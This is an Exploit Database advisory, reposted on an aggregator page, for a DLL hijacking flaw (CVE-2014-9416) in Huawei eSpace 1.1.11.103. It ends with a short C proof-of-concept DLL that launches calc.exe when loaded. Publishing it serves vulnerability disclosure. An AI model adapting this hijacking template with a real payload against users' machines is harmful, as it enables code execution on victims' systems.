Huawei eSpace 1.1.11.103 – DLL Hijacking

• Exploit Database
• 14 阅读

• 作者： LiquidWorm
  日期： 2019-05-20
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46866/

• /*
  
  Huawei eSpace Desktop DLL Hijacking Vulnerability
  
  
  Vendor: Huawei Technologies Co., Ltd.
  Product web page: https://www.huawei.com
  Affected version: eSpace 1.1.11.103 (aka eSpace ECS, eSpace Desktop, eSpace Meeting, eSpace UC)
  
  Summary: Create more convenient Enhanced Communications (EC) services for your
  enterprise with this suite of products. Huawei’s EC Suite (ECS) solution combines
  voice, data, video, and service streams, and provides users with easy and secure
  access to their service platform from any device, in any place, at any time. The
  eSpace Meeting allows you to join meetings that support voice, data, and video
  functions using the PC client, the tablet client, or an IP phone, or in a meeting
  room with an MT deployed.
  
  Desc: eSpace suffers from a DLL Hijacking issue. The vulnerability is caused due
  to the application loading libraries (mfc71enu.dll, mfc71loc.dll, tcapi.dll and 
  airpcap.dll) in an insecure manner. This can be exploited to load arbitrary libraries
  by tricking a user into opening a related application file (.html, .jpg, .png)
  located on a remote WebDAV or SMB share.
  
  Tested on: Microsoft Windows 7 Professional
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  
  19.08.2014
  
  Patched version: V200R003C00
  Vuln ID: HWPSIRT-2014-1153 and HWPSIRT-2014-1154
  CVE ID: CVE-2014-9416
  Advisory: https://www.huawei.com/en/psirt/security-advisories/hw-406589
  
  */
  
  
  // gcc -shared -o mfc71enu.dll exploit.c
  
  #include <windows.h> 
  
  BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
  {
  	exec();
  	return 0;
  }
  
  int exec()
  {
  	WinExec("calc.exe" , SW_NORMAL);
  	return 0;
  }